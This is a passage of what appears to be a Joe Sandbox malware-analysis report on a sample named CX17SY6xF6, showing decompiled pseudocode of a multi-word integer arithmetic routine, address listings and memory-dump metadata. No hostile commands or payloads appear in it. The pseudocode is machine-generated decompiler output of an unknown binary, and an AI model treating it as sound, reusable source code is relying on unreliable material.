                                                                                                                                                                                                                                                    															__eflags = _t362;
                                                                                                                                                                                                                                                    															_t265 = 0;
                                                                                                                                                                                                                                                    															do {
                                                                                                                                                                                                                                                    																_t282 =  *_t314;
                                                                                                                                                                                                                                                    																_t172 = _t362 + 4; // 0xfa8cbd83
                                                                                                                                                                                                                                                    																_t362 = _t172;
                                                                                                                                                                                                                                                    																_t314 = _t314 + 4;
                                                                                                                                                                                                                                                    																asm("adc eax, eax");
                                                                                                                                                                                                                                                    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                                                                                                                                                                                                                    																asm("adc eax, 0x0");
                                                                                                                                                                                                                                                    																_t265 = 0;
                                                                                                                                                                                                                                                    																_t338 = _t338 - 1;
                                                                                                                                                                                                                                                    																__eflags = _t338;
                                                                                                                                                                                                                                                    															} while (_t338 != 0);
                                                                                                                                                                                                                                                    															_t263 = _v8;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t263 = _t263 + 0xffffffff;
                                                                                                                                                                                                                                                    														asm("adc dword [ebp-0x18], 0xffffffff");
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    														__eflags = _v52 - _t334;
                                                                                                                                                                                                                                                    														if(_v52 < _t334) {
                                                                                                                                                                                                                                                    															goto L63;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												_t213 = _v12 - 1;
                                                                                                                                                                                                                                                    												__eflags = _t213;
                                                                                                                                                                                                                                                    												_v16 = _t213;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												__eflags = _t263;
                                                                                                                                                                                                                                                    												if(_t263 != 0) {
                                                                                                                                                                                                                                                    													goto L54;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t331 = 0 + _t263;
                                                                                                                                                                                                                                                    											asm("adc esi, 0x0");
                                                                                                                                                                                                                                                    											_v20 = _v20 - 4;
                                                                                                                                                                                                                                                    											_t313 = _v32 - 1;
                                                                                                                                                                                                                                                    											_t262 = _a4;
                                                                                                                                                                                                                                                    											_t278 = _v80 - 4;
                                                                                                                                                                                                                                                    											_t206 = _v12 - 1;
                                                                                                                                                                                                                                                    											_v76 = _t331;
                                                                                                                                                                                                                                                    											_v32 = _t313;
                                                                                                                                                                                                                                                    											_v80 = _t278;
                                                                                                                                                                                                                                                    											_v12 = _t206;
                                                                                                                                                                                                                                                    											__eflags = _t313;
                                                                                                                                                                                                                                                    										} while (_t313 >= 0);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t309 = _v16 + 1;
                                                                                                                                                                                                                                                    									_t204 = _t309;
                                                                                                                                                                                                                                                    									__eflags = _t204 -  *_t262;
                                                                                                                                                                                                                                                    									if(_t204 <  *_t262) {
                                                                                                                                                                                                                                                    										_t191 = _t204 + 1; // 0x10d8122
                                                                                                                                                                                                                                                    										_t274 =  &(_t262[_t191]);
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											 *_t274 = 0;
                                                                                                                                                                                                                                                    											_t194 =  &(_t274[1]); // 0x59d88b00
                                                                                                                                                                                                                                                    											_t274 = _t194;
                                                                                                                                                                                                                                                    											_t204 = _t204 + 1;
                                                                                                                                                                                                                                                    											__eflags = _t204 -  *_t262;
                                                                                                                                                                                                                                                    										} while (_t204 <  *_t262);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									 *_t262 = _t309;
                                                                                                                                                                                                                                                    									__eflags = _t309;
                                                                                                                                                                                                                                                    									if(_t309 != 0) {
                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                    											_t271 =  *_t262;
                                                                                                                                                                                                                                                    											__eflags = _t262[_t271];
                                                                                                                                                                                                                                                    											if(_t262[_t271] != 0) {
                                                                                                                                                                                                                                                    												goto L78;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t272 = _t271 + 0xffffffff;
                                                                                                                                                                                                                                                    											__eflags = _t272;
                                                                                                                                                                                                                                                    											 *_t262 = _t272;
                                                                                                                                                                                                                                                    											if(_t272 != 0) {
                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L78;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									L78:
                                                                                                                                                                                                                                                    									return _t331;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_t6 =  &(_t328[1]); // 0x8b00ffff
                                                                                                                                                                                                                                                    							_t295 =  *_t6;
                                                                                                                                                                                                                                                    							_v44 = _t295;
                                                                                                                                                                                                                                                    							__eflags = _t295 - 1;
                                                                                                                                                                                                                                                    							if(_t295 != 1) {
                                                                                                                                                                                                                                                    								__eflags = _t349;
                                                                                                                                                                                                                                                    								if(_t349 != 0) {
                                                                                                                                                                                                                                                    									_t342 = 0;
                                                                                                                                                                                                                                                    									_v12 = 0;
                                                                                                                                                                                                                                                    									_v8 = 0;
                                                                                                                                                                                                                                                    									_v20 = 0;
                                                                                                                                                                                                                                                    									__eflags = _t349 - 0xffffffff;
                                                                                                                                                                                                                                                    									if(_t349 != 0xffffffff) {
                                                                                                                                                                                                                                                    										_t250 = _v16 + 1;
                                                                                                                                                                                                                                                    										__eflags = _t250;
                                                                                                                                                                                                                                                    										_v32 = _t250;
                                                                                                                                                                                                                                                    										_t373 =  &(_t262[_t349 + 1]);
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											_t253 = E010DDCD0( *_t373, _t342, _t295, 0);
                                                                                                                                                                                                                                                    											_v68 = _t303;
                                                                                                                                                                                                                                                    											_t373 = _t373 - 4;
                                                                                                                                                                                                                                                    											_v20 = _t262;
                                                                                                                                                                                                                                                    											_t342 = _t295;
                                                                                                                                                                                                                                                    											_t303 = 0 + _t253;
                                                                                                                                                                                                                                                    											asm("adc ecx, 0x0");
                                                                                                                                                                                                                                                    											_v12 = _t303;
                                                                                                                                                                                                                                                    											_t34 =  &_v32;
                                                                                                                                                                                                                                                    											 *_t34 = _v32 - 1;
                                                                                                                                                                                                                                                    											__eflags =  *_t34;
                                                                                                                                                                                                                                                    											_v8 = _v12;
                                                                                                                                                                                                                                                    											_t295 = _v44;
                                                                                                                                                                                                                                                    										} while ( *_t34 != 0);
                                                                                                                                                                                                                                                    										_t262 = _a4;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v544 = 0;
                                                                                                                                                                                                                                                    									_t41 =  &(_t262[1]); // 0x4
                                                                                                                                                                                                                                                    									_t370 = _t41;
                                                                                                                                                                                                                                                    									 *_t262 = 0;
                                                                                                                                                                                                                                                    									E010DB76B(_t370, 0x1cc,  &_v540, 0);
                                                                                                                                                                                                                                                    									_t247 = _v20;
                                                                                                                                                                                                                                                    									__eflags = 0 - _t247;
                                                                                                                                                                                                                                                    									 *_t370 = _t342;
                                                                                                                                                                                                                                                    									_t262[2] = _t247;
                                                                                                                                                                                                                                                    									asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                    									__eflags =  ~0x00000000;
                                                                                                                                                                                                                                                    									 *_t262 = 0xbadbae;
                                                                                                                                                                                                                                                    									return _v12;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t344 =  &(_t262[1]);
                                                                                                                                                                                                                                                    									_v544 = 0;
                                                                                                                                                                                                                                                    									 *_t262 = 0;
                                                                                                                                                                                                                                                    									E010DB76B(_t344, 0x1cc,  &_v540, 0);
                                                                                                                                                                                                                                                    									_t256 = _t262[1];
                                                                                                                                                                                                                                                    									_t322 = _t256 % _v44;
                                                                                                                                                                                                                                                    									__eflags = 0 - _t322;
                                                                                                                                                                                                                                                    									 *_t344 = _t322;
                                                                                                                                                                                                                                                    									asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                    									 *_t262 =  ~0x00000000;
                                                                                                                                                                                                                                                    									return _t256 / _v44;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v544 = _t198;
                                                                                                                                                                                                                                                    								 *_t262 = _t198;
                                                                                                                                                                                                                                                    								E010DB76B( &(_t262[1]), 0x1cc,  &_v540, _t198);
                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                    								return _t262[1];
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					return _t197;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}























































































                                                                                                                                                                                                                                                    0x010d834c
                                                                                                                                                                                                                                                    0x010d834f
                                                                                                                                                                                                                                                    0x010d8353
                                                                                                                                                                                                                                                    0x010d835d
                                                                                                                                                                                                                                                    0x010d8360
                                                                                                                                                                                                                                                    0x010d8362
                                                                                                                                                                                                                                                    0x010d8364
                                                                                                                                                                                                                                                    0x010d8371
                                                                                                                                                                                                                                                    0x010d8374
                                                                                                                                                                                                                                                    0x010d8377
                                                                                                                                                                                                                                                    0x010d837a
                                                                                                                                                                                                                                                    0x010d837c
                                                                                                                                                                                                                                                    0x010d84af
                                                                                                                                                                                                                                                    0x010d84b1
                                                                                                                                                                                                                                                    0x010d84fa
                                                                                                                                                                                                                                                    0x010d84fe
                                                                                                                                                                                                                                                    0x010d8504
                                                                                                                                                                                                                                                    0x010d84b3
                                                                                                                                                                                                                                                    0x010d84b8
                                                                                                                                                                                                                                                    0x010d84ba
                                                                                                                                                                                                                                                    0x010d84bd
                                                                                                                                                                                                                                                    0x010d84bf
                                                                                                                                                                                                                                                    0x010d84c1
                                                                                                                                                                                                                                                    0x010d84f5
                                                                                                                                                                                                                                                    0x010d84f5
                                                                                                                                                                                                                                                    0x010d84f5
                                                                                                                                                                                                                                                    0x010d84c3
                                                                                                                                                                                                                                                    0x010d84c8
                                                                                                                                                                                                                                                    0x010d84ce
                                                                                                                                                                                                                                                    0x010d84ce
                                                                                                                                                                                                                                                    0x010d84d1
                                                                                                                                                                                                                                                    0x010d84d3
                                                                                                                                                                                                                                                    0x010d84d5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84d7
                                                                                                                                                                                                                                                    0x010d84d8
                                                                                                                                                                                                                                                    0x010d84db
                                                                                                                                                                                                                                                    0x010d84de
                                                                                                                                                                                                                                                    0x010d84e0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84e2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84e2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84e0
                                                                                                                                                                                                                                                    0x010d84e4
                                                                                                                                                                                                                                                    0x010d84eb
                                                                                                                                                                                                                                                    0x010d84ef
                                                                                                                                                                                                                                                    0x010d84f3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84f3
                                                                                                                                                                                                                                                    0x010d84f6
                                                                                                                                                                                                                                                    0x010d84f6
                                                                                                                                                                                                                                                    0x010d84f8
                                                                                                                                                                                                                                                    0x010d8505
                                                                                                                                                                                                                                                    0x010d8508
                                                                                                                                                                                                                                                    0x010d850b
                                                                                                                                                                                                                                                    0x010d850e
                                                                                                                                                                                                                                                    0x010d850e
                                                                                                                                                                                                                                                    0x010d8512
                                                                                                                                                                                                                                                    0x010d8515
                                                                                                                                                                                                                                                    0x010d8518
                                                                                                                                                                                                                                                    0x010d851b
                                                                                                                                                                                                                                                    0x010d8526
                                                                                                                                                                                                                                                    0x010d851d
                                                                                                                                                                                                                                                    0x010d8522
                                                                                                                                                                                                                                                    0x010d8522
                                                                                                                                                                                                                                                    0x010d8530
                                                                                                                                                                                                                                                    0x010d8535
                                                                                                                                                                                                                                                    0x010d8538
                                                                                                                                                                                                                                                    0x010d853a
                                                                                                                                                                                                                                                    0x010d8544
                                                                                                                                                                                                                                                    0x010d8547
                                                                                                                                                                                                                                                    0x010d854e
                                                                                                                                                                                                                                                    0x010d8551
                                                                                                                                                                                                                                                    0x010d8554
                                                                                                                                                                                                                                                    0x010d855c
                                                                                                                                                                                                                                                    0x010d8562
                                                                                                                                                                                                                                                    0x010d8562
                                                                                                                                                                                                                                                    0x010d8562
                                                                                                                                                                                                                                                    0x010d8562
                                                                                                                                                                                                                                                    0x010d8554
                                                                                                                                                                                                                                                    0x010d8567
                                                                                                                                                                                                                                                    0x010d856e
                                                                                                                                                                                                                                                    0x010d856e
                                                                                                                                                                                                                                                    0x010d8571
                                                                                                                                                                                                                                                    0x010d8574
                                                                                                                                                                                                                                                    0x010d87a6
                                                                                                                                                                                                                                                    0x010d87a6
                                                                                                                                                                                                                                                    0x010d857a
                                                                                                                                                                                                                                                    0x010d8580
                                                                                                                                                                                                                                                    0x010d8583
                                                                                                                                                                                                                                                    0x010d8589
                                                                                                                                                                                                                                                    0x010d858c
                                                                                                                                                                                                                                                    0x010d858f
                                                                                                                                                                                                                                                    0x010d8592
                                                                                                                                                                                                                                                    0x010d8592
                                                                                                                                                                                                                                                    0x010d8595
                                                                                                                                                                                                                                                    0x010d859c
                                                                                                                                                                                                                                                    0x010d859c
                                                                                                                                                                                                                                                    0x010d8597
                                                                                                                                                                                                                                                    0x010d8597
                                                                                                                                                                                                                                                    0x010d8597
                                                                                                                                                                                                                                                    0x010d859e
                                                                                                                                                                                                                                                    0x010d85a2
                                                                                                                                                                                                                                                    0x010d85a5
                                                                                                                                                                                                                                                    0x010d85a7
                                                                                                                                                                                                                                                    0x010d85aa
                                                                                                                                                                                                                                                    0x010d85b1
                                                                                                                                                                                                                                                    0x010d85b4
                                                                                                                                                                                                                                                    0x010d85b7
                                                                                                                                                                                                                                                    0x010d85c2
                                                                                                                                                                                                                                                    0x010d85c5
                                                                                                                                                                                                                                                    0x010d85ca
                                                                                                                                                                                                                                                    0x010d85cf
                                                                                                                                                                                                                                                    0x010d85d6
                                                                                                                                                                                                                                                    0x010d85db
                                                                                                                                                                                                                                                    0x010d85dd
                                                                                                                                                                                                                                                    0x010d85df
                                                                                                                                                                                                                                                    0x010d85e3
                                                                                                                                                                                                                                                    0x010d85e6
                                                                                                                                                                                                                                                    0x010d85e9
                                                                                                                                                                                                                                                    0x010d85f1
                                                                                                                                                                                                                                                    0x010d85fa
                                                                                                                                                                                                                                                    0x010d85fa
                                                                                                                                                                                                                                                    0x010d85fc
                                                                                                                                                                                                                                                    0x010d85ff
                                                                                                                                                                                                                                                    0x010d85ff
                                                                                                                                                                                                                                                    0x010d85e9
                                                                                                                                                                                                                                                    0x010d8609
                                                                                                                                                                                                                                                    0x010d860e
                                                                                                                                                                                                                                                    0x010d8613
                                                                                                                                                                                                                                                    0x010d8615
                                                                                                                                                                                                                                                    0x010d8618
                                                                                                                                                                                                                                                    0x010d861a
                                                                                                                                                                                                                                                    0x010d861d
                                                                                                                                                                                                                                                    0x010d8620
                                                                                                                                                                                                                                                    0x010d8622
                                                                                                                                                                                                                                                    0x010d8625
                                                                                                                                                                                                                                                    0x010d8628
                                                                                                                                                                                                                                                    0x010d862a
                                                                                                                                                                                                                                                    0x010d8631
                                                                                                                                                                                                                                                    0x010d8636
                                                                                                                                                                                                                                                    0x010d8639
                                                                                                                                                                                                                                                    0x010d8643
                                                                                                                                                                                                                                                    0x010d8645
                                                                                                                                                                                                                                                    0x010d8647
                                                                                                                                                                                                                                                    0x010d864a
                                                                                                                                                                                                                                                    0x010d864a
                                                                                                                                                                                                                                                    0x010d864c
                                                                                                                                                                                                                                                    0x010d864f
                                                                                                                                                                                                                                                    0x010d8652
                                                                                                                                                                                                                                                    0x010d8655
                                                                                                                                                                                                                                                    0x010d8658
                                                                                                                                                                                                                                                    0x010d862c
                                                                                                                                                                                                                                                    0x010d862c
                                                                                                                                                                                                                                                    0x010d862f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d862f
                                                                                                                                                                                                                                                    0x010d865b
                                                                                                                                                                                                                                                    0x010d865d
                                                                                                                                                                                                                                                    0x010d865f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d8661
                                                                                                                                                                                                                                                    0x010d8661
                                                                                                                                                                                                                                                    0x010d8664
                                                                                                                                                                                                                                                    0x010d8666
                                                                                                                                                                                                                                                    0x010d8666
                                                                                                                                                                                                                                                    0x010d8674
                                                                                                                                                                                                                                                    0x010d8677
                                                                                                                                                                                                                                                    0x010d867c
                                                                                                                                                                                                                                                    0x010d867e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d8680
                                                                                                                                                                                                                                                    0x010d8687
                                                                                                                                                                                                                                                    0x010d8687
                                                                                                                                                                                                                                                    0x010d868a
                                                                                                                                                                                                                                                    0x010d868d
                                                                                                                                                                                                                                                    0x010d8690
                                                                                                                                                                                                                                                    0x010d8693
                                                                                                                                                                                                                                                    0x010d8693
                                                                                                                                                                                                                                                    0x010d8696
                                                                                                                                                                                                                                                    0x010d8699
                                                                                                                                                                                                                                                    0x010d869d
                                                                                                                                                                                                                                                    0x010d86a0
                                                                                                                                                                                                                                                    0x010d86a2
                                                                                                                                                                                                                                                    0x010d86a5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d86a7
                                                                                                                                                                                                                                                    0x010d86a5
                                                                                                                                                                                                                                                    0x010d8682
                                                                                                                                                                                                                                                    0x010d8682
                                                                                                                                                                                                                                                    0x010d8685
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d8685
                                                                                                                                                                                                                                                    0x010d86ac
                                                                                                                                                                                                                                                    0x010d86ac
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d86ac
                                                                                                                                                                                                                                                    0x010d86a9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d86a9
                                                                                                                                                                                                                                                    0x010d8664
                                                                                                                                                                                                                                                    0x010d865f
                                                                                                                                                                                                                                                    0x010d86af
                                                                                                                                                                                                                                                    0x010d86af
                                                                                                                                                                                                                                                    0x010d86b1
                                                                                                                                                                                                                                                    0x010d86bb
                                                                                                                                                                                                                                                    0x010d86bb
                                                                                                                                                                                                                                                    0x010d86be
                                                                                                                                                                                                                                                    0x010d86c0
                                                                                                                                                                                                                                                    0x010d86c2
                                                                                                                                                                                                                                                    0x010d86c4
                                                                                                                                                                                                                                                    0x010d86c9
                                                                                                                                                                                                                                                    0x010d86cc
                                                                                                                                                                                                                                                    0x010d86cc
                                                                                                                                                                                                                                                    0x010d86cf
                                                                                                                                                                                                                                                    0x010d86d2
                                                                                                                                                                                                                                                    0x010d86d5
                                                                                                                                                                                                                                                    0x010d86d7
                                                                                                                                                                                                                                                    0x010d86ec
                                                                                                                                                                                                                                                    0x010d86ee
                                                                                                                                                                                                                                                    0x010d86f0
                                                                                                                                                                                                                                                    0x010d86f2
                                                                                                                                                                                                                                                    0x010d86f4
                                                                                                                                                                                                                                                    0x010d86f6
                                                                                                                                                                                                                                                    0x010d86f8
                                                                                                                                                                                                                                                    0x010d86fa
                                                                                                                                                                                                                                                    0x010d86fd
                                                                                                                                                                                                                                                    0x010d86fd
                                                                                                                                                                                                                                                    0x010d8701
                                                                                                                                                                                                                                                    0x010d8703
                                                                                                                                                                                                                                                    0x010d8709
                                                                                                                                                                                                                                                    0x010d870c
                                                                                                                                                                                                                                                    0x010d870c
                                                                                                                                                                                                                                                    0x010d870c
                                                                                                                                                                                                                                                    0x010d8710
                                                                                                                                                                                                                                                    0x010d8710
                                                                                                                                                                                                                                                    0x010d8715
                                                                                                                                                                                                                                                    0x010d8718
                                                                                                                                                                                                                                                    0x010d8718
                                                                                                                                                                                                                                                    0x010d871d
                                                                                                                                                                                                                                                    0x010d871f
                                                                                                                                                                                                                                                    0x010d8721
                                                                                                                                                                                                                                                    0x010d8728
                                                                                                                                                                                                                                                    0x010d8728
                                                                                                                                                                                                                                                    0x010d872a
                                                                                                                                                                                                                                                    0x010d872f
                                                                                                                                                                                                                                                    0x010d8731
                                                                                                                                                                                                                                                    0x010d8734
                                                                                                                                                                                                                                                    0x010d8734
                                                                                                                                                                                                                                                    0x010d8737
                                                                                                                                                                                                                                                    0x010d8740
                                                                                                                                                                                                                                                    0x010d8740
                                                                                                                                                                                                                                                    0x010d8742
                                                                                                                                                                                                                                                    0x010d8742
                                                                                                                                                                                                                                                    0x010d8747
                                                                                                                                                                                                                                                    0x010d874d
                                                                                                                                                                                                                                                    0x010d8751
                                                                                                                                                                                                                                                    0x010d8754
                                                                                                                                                                                                                                                    0x010d8757
                                                                                                                                                                                                                                                    0x010d8759
                                                                                                                                                                                                                                                    0x010d8759
                                                                                                                                                                                                                                                    0x010d8759
                                                                                                                                                                                                                                                    0x010d875e
                                                                                                                                                                                                                                                    0x010d875e
                                                                                                                                                                                                                                                    0x010d8761
                                                                                                                                                                                                                                                    0x010d8764
                                                                                                                                                                                                                                                    0x010d8723
                                                                                                                                                                                                                                                    0x010d8723
                                                                                                                                                                                                                                                    0x010d8726
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d8726
                                                                                                                                                                                                                                                    0x010d8721
                                                                                                                                                                                                                                                    0x010d876b
                                                                                                                                                                                                                                                    0x010d876b
                                                                                                                                                                                                                                                    0x010d876c
                                                                                                                                                                                                                                                    0x010d86b3
                                                                                                                                                                                                                                                    0x010d86b3
                                                                                                                                                                                                                                                    0x010d86b5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d86b5
                                                                                                                                                                                                                                                    0x010d877c
                                                                                                                                                                                                                                                    0x010d8781
                                                                                                                                                                                                                                                    0x010d8784
                                                                                                                                                                                                                                                    0x010d8788
                                                                                                                                                                                                                                                    0x010d8789
                                                                                                                                                                                                                                                    0x010d878c
                                                                                                                                                                                                                                                    0x010d878f
                                                                                                                                                                                                                                                    0x010d8790
                                                                                                                                                                                                                                                    0x010d8793
                                                                                                                                                                                                                                                    0x010d8796
                                                                                                                                                                                                                                                    0x010d8799
                                                                                                                                                                                                                                                    0x010d879c
                                                                                                                                                                                                                                                    0x010d879c
                                                                                                                                                                                                                                                    0x010d87a4
                                                                                                                                                                                                                                                    0x010d87ab
                                                                                                                                                                                                                                                    0x010d87ac
                                                                                                                                                                                                                                                    0x010d87ae
                                                                                                                                                                                                                                                    0x010d87b0
                                                                                                                                                                                                                                                    0x010d87b2
                                                                                                                                                                                                                                                    0x010d87b5
                                                                                                                                                                                                                                                    0x010d87c0
                                                                                                                                                                                                                                                    0x010d87c0
                                                                                                                                                                                                                                                    0x010d87c6
                                                                                                                                                                                                                                                    0x010d87c6
                                                                                                                                                                                                                                                    0x010d87c9
                                                                                                                                                                                                                                                    0x010d87ca
                                                                                                                                                                                                                                                    0x010d87ca
                                                                                                                                                                                                                                                    0x010d87c0
                                                                                                                                                                                                                                                    0x010d87ce
                                                                                                                                                                                                                                                    0x010d87d0
                                                                                                                                                                                                                                                    0x010d87d2
                                                                                                                                                                                                                                                    0x010d87d4
                                                                                                                                                                                                                                                    0x010d87d4
                                                                                                                                                                                                                                                    0x010d87d6
                                                                                                                                                                                                                                                    0x010d87da
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d87dc
                                                                                                                                                                                                                                                    0x010d87dc
                                                                                                                                                                                                                                                    0x010d87df
                                                                                                                                                                                                                                                    0x010d87e1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d87e1
                                                                                                                                                                                                                                                    0x010d87d4
                                                                                                                                                                                                                                                    0x010d87e3
                                                                                                                                                                                                                                                    0x010d87ed
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d84f8
                                                                                                                                                                                                                                                    0x010d8382
                                                                                                                                                                                                                                                    0x010d8382
                                                                                                                                                                                                                                                    0x010d8382
                                                                                                                                                                                                                                                    0x010d8385
                                                                                                                                                                                                                                                    0x010d8388
                                                                                                                                                                                                                                                    0x010d838b
                                                                                                                                                                                                                                                    0x010d83bc
                                                                                                                                                                                                                                                    0x010d83be
                                                                                                                                                                                                                                                    0x010d8409
                                                                                                                                                                                                                                                    0x010d840b
                                                                                                                                                                                                                                                    0x010d8412
                                                                                                                                                                                                                                                    0x010d8419
                                                                                                                                                                                                                                                    0x010d841c
                                                                                                                                                                                                                                                    0x010d841f
                                                                                                                                                                                                                                                    0x010d8425
                                                                                                                                                                                                                                                    0x010d8425
                                                                                                                                                                                                                                                    0x010d8426
                                                                                                                                                                                                                                                    0x010d8429
                                                                                                                                                                                                                                                    0x010d8430
                                                                                                                                                                                                                                                    0x010d8439
                                                                                                                                                                                                                                                    0x010d843e
                                                                                                                                                                                                                                                    0x010d8441
                                                                                                                                                                                                                                                    0x010d8446
                                                                                                                                                                                                                                                    0x010d8449
                                                                                                                                                                                                                                                    0x010d844b
                                                                                                                                                                                                                                                    0x010d8450
                                                                                                                                                                                                                                                    0x010d8453
                                                                                                                                                                                                                                                    0x010d8456
                                                                                                                                                                                                                                                    0x010d8456
                                                                                                                                                                                                                                                    0x010d8456
                                                                                                                                                                                                                                                    0x010d845a
                                                                                                                                                                                                                                                    0x010d845d
                                                                                                                                                                                                                                                    0x010d845d
                                                                                                                                                                                                                                                    0x010d8462
                                                                                                                                                                                                                                                    0x010d8462
                                                                                                                                                                                                                                                    0x010d846d
                                                                                                                                                                                                                                                    0x010d8478
                                                                                                                                                                                                                                                    0x010d8478
                                                                                                                                                                                                                                                    0x010d847b
                                                                                                                                                                                                                                                    0x010d8487
                                                                                                                                                                                                                                                    0x010d848c
                                                                                                                                                                                                                                                    0x010d8497
                                                                                                                                                                                                                                                    0x010d8499
                                                                                                                                                                                                                                                    0x010d849b
                                                                                                                                                                                                                                                    0x010d84a1
                                                                                                                                                                                                                                                    0x010d84a6
                                                                                                                                                                                                                                                    0x010d84a8
                                                                                                                                                                                                                                                    0x010d84ae
                                                                                                                                                                                                                                                    0x010d83c0
                                                                                                                                                                                                                                                    0x010d83cc
                                                                                                                                                                                                                                                    0x010d83cf
                                                                                                                                                                                                                                                    0x010d83df
                                                                                                                                                                                                                                                    0x010d83e5
                                                                                                                                                                                                                                                    0x010d83ec
                                                                                                                                                                                                                                                    0x010d83ee
                                                                                                                                                                                                                                                    0x010d83f6
                                                                                                                                                                                                                                                    0x010d83f8
                                                                                                                                                                                                                                                    0x010d83fa
                                                                                                                                                                                                                                                    0x010d83ff
                                                                                                                                                                                                                                                    0x010d8402
                                                                                                                                                                                                                                                    0x010d8408
                                                                                                                                                                                                                                                    0x010d8408
                                                                                                                                                                                                                                                    0x010d838d
                                                                                                                                                                                                                                                    0x010d8394
                                                                                                                                                                                                                                                    0x010d839a
                                                                                                                                                                                                                                                    0x010d83a9
                                                                                                                                                                                                                                                    0x010d83b3
                                                                                                                                                                                                                                                    0x010d83bb
                                                                                                                                                                                                                                                    0x010d83bb
                                                                                                                                                                                                                                                    0x010d838b
                                                                                                                                                                                                                                                    0x010d8366
                                                                                                                                                                                                                                                    0x010d8369
                                                                                                                                                                                                                                                    0x010d836f
                                                                                                                                                                                                                                                    0x010d836f
                                                                                                                                                                                                                                                    0x010d8355
                                                                                                                                                                                                                                                    0x010d835b
                                                                                                                                                                                                                                                    0x010d835b

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
